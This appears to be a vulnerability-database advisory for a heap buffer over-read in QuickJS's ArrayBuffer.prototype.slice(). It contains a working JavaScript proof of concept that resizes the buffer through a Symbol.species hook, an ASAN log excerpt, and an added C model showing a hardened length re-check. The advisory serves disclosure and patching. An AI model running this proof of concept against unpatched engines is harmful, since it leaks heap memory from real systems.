| Title | Fabrice Bellard QuickJS Latest commit eb2c890 (and earlier versions) Memory Corruption |
|---|
| Description | A heap buffer overflow vulnerability exists in `ArrayBuffer.prototype.slice()` for resizable ArrayBuffers.
The following proof-of-concept triggers the issue:
```js
let buf = new ArrayBuffer(1000, { maxByteLength: 2000 });
Object.defineProperty(buf.constructor, Symbol.species, {
  value: function(len) {
    buf.resize(100);            // shrink the source buffer while slice() is in progress
    return new ArrayBuffer(len);
  }
});
buf.slice(500, 1000);
```
The vulnerability is a Time-of-Check-Time-of-Use (TOCTOU, CWE-367) condition: `slice()` computes its copy offsets against the buffer length, then calls the script-controlled species constructor, which resizes the source buffer mid-operation. The subsequent `memcpy()` uses the stale offset values calculated before the resize, resulting in an out-of-bounds read of 400+ bytes beyond the allocated heap buffer.
ASAN logs:
```text
ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60b000002b74 at pc 0x7f41b0c4814b bp 0x7ffc17851450 sp 0x7ffc17850c00
READ of size 500 at 0x60b000002b74 thread T0 [...]
```
Impact: Information disclosure, since heap memory beyond the buffer is read and copied into the result (CWE-125: Out-of-bounds Read).
Affected Implementations:
- bellard/quickjs (issue #451)
- quickjs-ng/quickjs (issue #1210)
Credits: Iacob Razvan Mihai |
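As an added illustration, not code from QuickJS or from the reporter, the C model below shows the TOCTOU shape the report describes and the check a reviewer should look for in a fixed `js_array_buffer_slice`: the source length is re-read after the species constructor returns, and the copy is clamped to what still exists. The type and function names (`ab_t`, `ab_slice_hardened`, `species_hook`, `demo`) and the reallocating `resize` model are assumptions made for this example; the buffer sizes and the `slice(500, 1000)` call mirror the PoC.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed model of a resizable ArrayBuffer. It is not QuickJS's
 * JSArrayBuffer; all names here are hypothetical. The backing store is
 * exactly byte_length bytes, so a shrink really does discard memory. */
typedef struct {
    uint8_t *data;
    size_t byte_length;
    size_t max_byte_length;
} ab_t;

static int ab_init(ab_t *b, size_t len, size_t max_len, uint8_t fill) {
    if (len > max_len) return -1;
    b->data = malloc(len ? len : 1);
    if (!b->data) return -1;
    memset(b->data, fill, len);
    b->byte_length = len;
    b->max_byte_length = max_len;
    return 0;
}

/* buf.resize(n): reallocate to the new length (grown bytes are zeroed). */
static int ab_resize(ab_t *b, size_t new_len) {
    if (new_len > b->max_byte_length) return -1;
    uint8_t *p = realloc(b->data, new_len ? new_len : 1);
    if (!p) return -1;
    if (new_len > b->byte_length)
        memset(p + b->byte_length, 0, new_len - b->byte_length);
    b->data = p;
    b->byte_length = new_len;
    return 0;
}

static void ab_free(ab_t *b) { free(b->data); b->data = NULL; b->byte_length = 0; }

/* The Symbol.species hook: script-controlled code that runs inside slice(). */
typedef ab_t *(*species_fn)(size_t len, void *ctx);

/* Hardened slice. The vulnerable shape computes new_len before the species
 * call and hands that same value to memcpy afterwards; here the source length
 * is re-read after the hook returns and the copy is clamped to it.
 * Returns bytes copied, or -1 on error; *out receives the new buffer. */
static long ab_slice_hardened(ab_t *src, size_t start, size_t end,
                              species_fn species, void *ctx, ab_t **out) {
    size_t len = src->byte_length;                 /* time of check */
    if (start > len) start = len;
    if (end > len) end = len;
    size_t new_len = end > start ? end - start : 0;

    ab_t *dst = species(new_len, ctx);             /* may call resize() */
    if (!dst || dst == src || dst->byte_length < new_len) return -1;

    size_t cur_len = src->byte_length;             /* time of use: re-read */
    size_t count = 0;
    if (start < cur_len)
        count = new_len < cur_len - start ? new_len : cur_len - start;
    if (count)
        memcpy(dst->data, src->data + start, count);
    *out = dst;
    return (long)count;
}

typedef struct { ab_t *src; int shrink; } hook_ctx;

/* Hook with the PoC's behaviour: optionally shrink the source to 100 bytes,
 * then return a fresh buffer of the requested length. */
static ab_t *species_hook(size_t len, void *p) {
    hook_ctx *c = p;
    if (c->shrink && ab_resize(c->src, 100) != 0) return NULL;
    ab_t *dst = malloc(sizeof *dst);
    if (!dst || ab_init(dst, len, len, 0) != 0) { free(dst); return NULL; }
    return dst;
}

/* slice(start, end) on a 1000-byte buffer with maxByteLength 2000 through the
 * hardened path. Returns bytes copied, -1 on error, -2 if wrong bytes landed. */
static long demo(size_t start, size_t end, int shrink) {
    ab_t src;
    if (ab_init(&src, 1000, 2000, 0xAB) != 0) return -1;
    hook_ctx c = { &src, shrink };
    ab_t *out = NULL;
    long n = ab_slice_hardened(&src, start, end, species_hook, &c, &out);
    if (n > 0 && out->data[0] != 0xAB) n = -2;
    if (out) { ab_free(out); free(out); }
    ab_free(&src);
    return n;
}

int main(void) {
    printf("no resize, slice(500,1000):     %ld bytes\n", demo(500, 1000, 0));
    printf("resize to 100, slice(500,1000): %ld bytes\n", demo(500, 1000, 1));
    printf("resize to 100, slice(50,300):   %ld bytes\n", demo(50, 300, 1));
    return 0;
}
```

With the PoC's shape (source shrunk to 100 bytes, start 500) the hardened path copies nothing, because the start offset lies past the post-resize length; a slice whose start is still inside the shrunken buffer is clamped rather than read past the end. The same re-check must cover detachment as well as resizing, since a species constructor can also transfer the buffer away.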
|---|
| Source | https://github.com/bellard/quickjs/issues/451 |
|---|
| User | im-razvan (UID 91857) |
|---|
| Submission | 10/21/2025 01:27 (8 months ago) |
|---|
| Moderation | 11/05/2025 14:54 (16 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 331268 [QuickJS up to eb2c89087def1829ed99630cb14b549d7a98408c quickjs.c js_array_buffer_slice buffer over-read] |
|---|
| Points | 20 |
|---|